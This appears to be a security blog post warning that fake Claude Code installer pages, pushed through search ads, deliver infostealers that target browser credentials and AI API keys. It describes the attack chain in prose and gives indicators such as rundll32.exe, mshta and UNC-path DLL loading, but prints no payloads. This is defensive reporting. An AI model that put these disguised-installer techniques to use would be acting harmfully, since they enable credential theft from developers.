← All PostsFake Claude Code Installers Are Stealing Your API Keys
cybersecuritydeveloper toolsmalware

Fake Claude Code Installers Are Stealing Your API Keys

June 4, 2026

If you searched "install Claude Code" or "download Claude Code" any time since March 2026 and clicked the top result — there's a chance you hit a fake page.

Threat actors built a network of more than 88 fake installation pages, purchased Google Ads to push them above legitimate documentation in search results, and used them to deliver credential-stealing malware that never writes a file to your hard drive. As of May 14, 2026, 32 of those fake domains were still live and serving malicious content. Ten new ones emerged while researchers were writing up their findings.

This isn't a low-effort phishing campaign. It's targeted, technically sophisticated, and still running.

How the Attack Works

The attack begins when a developer searches for terms like "install Claude Code" or "Claude Code CLI." Attackers purchase sponsored ads that appear above legitimate results, redirecting victims to convincing lookalike websites that closely mimic official Claude documentation pages.

The fake page instructs users to install Claude Code using terminal commands for macOS and Windows. Anyone accustomed to developer tools could be tricked into copying and executing them without hesitation — and that's exactly when the infection chain triggers.

Attackers hide malicious commands inside seemingly legitimate installation instructions, often without disrupting the expected install process — so Claude Code might actually install. You'd have no idea anything went wrong.

What Gets Stolen

This isn't a generic infostealer. It was built specifically for AI developer environments.

This is the first infostealer built to specifically steal API keys from AI coding assistants like Cline and Continue.dev, not just browsers and crypto wallets.

Once executed, the malicious scripts deploy obfuscated PowerShell or shell-based loaders depending on your OS. The malware targets Chromium-based browsers including Chrome, Edge, Brave, Opera, Arc, Vivaldi, and others — extracting encrypted browser keys, authentication tokens, saved passwords, session cookies, and in some cases stored payment information.

On macOS, it installs a backdoor capable of spawning remote shells and executing attacker-controlled commands.

Why It's Hard to Take Down

The campaign's crypto-clipper routes its command-and-control through a Binance Smart Chain smart contract. There's no domain to seize, no server to shut off.

When one fake domain gets flagged, another goes up. The operation rotates infrastructure continuously, allowing malicious sites to quickly reappear after takedowns. Ten new GitHub Pages domains appeared during Straiker's own analysis window.

Attackers likely compromised legitimate advertiser accounts to run the Google Ads, enabling the campaign to pass review systems. That's why the ads look real — because the ad account behind them was real.

Who Else Is Targeted

Claude Code is the headline, but it's not the only tool being impersonated. The campaign has targeted users of Claude Code, Cline, JetBrains, Snowflake, and Perplexity Comet since March 2026.

If you install AI developer tools by searching Google and clicking the top result, you're in the target group.

What to Do Right Now

Check if you're affected:

  • Look for unexpected API usage on your Anthropic, OpenAI, or other AI provider dashboards
  • Check for unknown active sessions in your cloud accounts (AWS, GCP, Azure, Snowflake)
  • Review saved credentials in Chrome, Edge, Brave — assume they may be compromised if you ran a terminal command from a search result recently

Going forward:

A legitimate install one-liner won't invoke rundll32.exe, mshta, or load DLLs from UNC paths. If an install command looks even slightly off — stop.

Never install developer tools from a Google Ad. Navigate directly to the official documentation. For Claude Code, that's claude.ai/code. Bookmark it.

Rotate your API keys if you have any doubt. It takes two minutes and eliminates the risk entirely.

This attack pattern is exactly what the LLM-driven cyberattack Sysdig documented last month showed us: developers are the target. AI credentials are the prize. The attack surface is growing faster than most teams are tracking it.

Sources: Straiker, Bitdefender, TechRepublic, Trend Micro